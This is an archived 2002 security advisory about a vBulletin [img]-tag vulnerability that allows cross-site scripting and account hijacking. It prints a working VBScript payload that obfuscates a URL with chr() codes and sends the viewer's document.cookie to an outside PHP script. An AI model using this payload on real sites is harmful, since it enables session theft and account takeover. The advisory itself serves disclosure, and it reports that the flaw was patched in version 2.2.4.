Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: web5203.htm

vBulletin account hijacking using tag



22th Mar 2002 [SBWID-5203]
COMMAND

	vBulletin account hijacking using [IMG] tag

SYSTEMS AFFECTED

	 2.2.2 & 2.2.1 & maybe olders

	

PROBLEM

	Cano2 [http://www.buhaboard.de] found following, regarding vBulletin,  a
	web forums package written in PHP.
	

	There is a vulnerability in the vBulletins\'s [img]-Tag  implementation,
	that allows users to inject  vbs-code  in  posts  and  private  messages
	([img] is switched on by default). Through that, an attacker is able  to
	steal other users cookies and maybe hijack their accounts.
	

	The  following  code  sends  the  user\'s   cookie   to   a   php-script
	(http://www.ignite.barrysworld.net/test.php?c= in this case, which  just
	prints it back to the browser) It is enclosed in [code]-Tag, the url  is
	encoded in ascii and linebreaks are inserted to avoid filtering of  some
	characters and insertion of <br>-Tags
	

	

	[code][img]vbscript:location.replace(

	chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+

	chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+

	chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+

	chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+

	chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+

	chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+

	chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+

	chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+

	chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+

	escape(document.cookie)

	)[/img][/code]

	

	

SOLUTION

	Jelsoft claimed to have  made  a  patch  \"which  clamps  down  on  what
	characters are allowed in an [img] tag,  as  well  as  requiring  it  to
	start with http://\".
	

	Patched in last version (2.2.4).


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH